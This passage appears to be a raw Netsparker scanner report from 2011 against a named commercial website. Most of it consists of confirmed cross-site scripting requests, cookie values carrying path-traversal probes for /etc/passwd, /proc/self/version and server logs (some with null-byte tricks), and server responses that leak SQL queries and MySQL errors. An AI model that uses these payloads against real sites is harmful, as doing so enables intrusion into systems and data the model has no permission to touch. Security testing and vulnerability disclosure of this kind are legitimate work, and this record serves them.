OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:11 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9n0s2keokcfhgkk29m6fhfgla4; path=/
Content-Length: 3383
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005E3)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005E3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005E3)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005E3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005E3)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005E3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005E3)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005E3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005E3)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005E3)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005E3)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/lodi00/

/ppc/leadflow/lodi00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/lodi00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
nsextt GET '"--></style></script><script>alert(0x0005E4)</script>

Request

GET /ppc/leadflow/lodi00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005E4)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/lodi00/project.php?catId=110003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:11 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=kobk2emk8c8r7cv44iuomtik95; path=/
Content-Length: 3033
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/?nsextt='"--></style></script><script>netsparker(0x0005E4)</script>' OR prj.project_page_url = 'leadflow/lodi00/?nsextt='"--></style></script><script>netsparker(0x0005E4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/?nsextt='"--></style></script><script>netsparker(0x0005E4)</script>' OR prj.project_page_url = 'leadflow/lodi00/?nsextt='"--></style></script><script>netsparker(0x0005E4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/?nsextt='"--></style></script><script>netsparker(0x0005E4)</script>' OR prj.project_page_url = 'leadflow/lodi00/?nsextt='"--></style></script><script>netsparker(0x0005E4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/?nsextt='"--></style></script><script>netsparker(0x0005E4)</script>' OR prj.project_page_url = 'leadflow/lodi00/?nsextt='"--></style></script><script>netsparker(0x0005E4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/?nsextt='"--></style></script><script>netsparker(0x0005E4)</script>' OR prj.project_page_url = 'leadflow/lodi00/?nsextt='"--></style></script><script>netsparker(0x0005E4)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005E4)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/lodi00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005E9)%3C/script%3E

/ppc/leadflow/lodi00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005E9)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/lodi00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0005E9)</script>

Request

GET /ppc/leadflow/lodi00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005E9)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/lodi00/project.php?catId=110003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:37 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=jd478v660jcgug5ko2fjm30ni5; path=/
Content-Length: 2953
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/'"--></style></script><script>netsparker(0x0005E9)</script>' OR prj.project_page_url = 'leadflow/lodi00/'"--></style></script><script>netsparker(0x0005E9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/'"--></style></script><script>netsparker(0x0005E9)</script>' OR prj.project_page_url = 'leadflow/lodi00/'"--></style></script><script>netsparker(0x0005E9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/'"--></style></script><script>netsparker(0x0005E9)</script>' OR prj.project_page_url = 'leadflow/lodi00/'"--></style></script><script>netsparker(0x0005E9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/'"--></style></script><script>netsparker(0x0005E9)</script>' OR prj.project_page_url = 'leadflow/lodi00/'"--></style></script><script>netsparker(0x0005E9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/'"--></style></script><script>netsparker(0x0005E9)</script>' OR prj.project_page_url = 'leadflow/lodi00/'"--></style></script><script>netsparker(0x0005E9)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005E9)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/lodi00/

/ppc/leadflow/lodi00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/lodi00/?'"--></style></script><script>alert(0x0005EB)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0005EB)</script>

Request

GET /ppc/leadflow/lodi00/?'"--></style></script><script>netsparker(0x0005EB)</script> HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/lodi00/project.php?catId=110003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:41 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=sf5kk8qr44so661fricsd0ekh4; path=/
Content-Length: 2963
Connection: close
Content-Type: text/html; charset=UTF-8


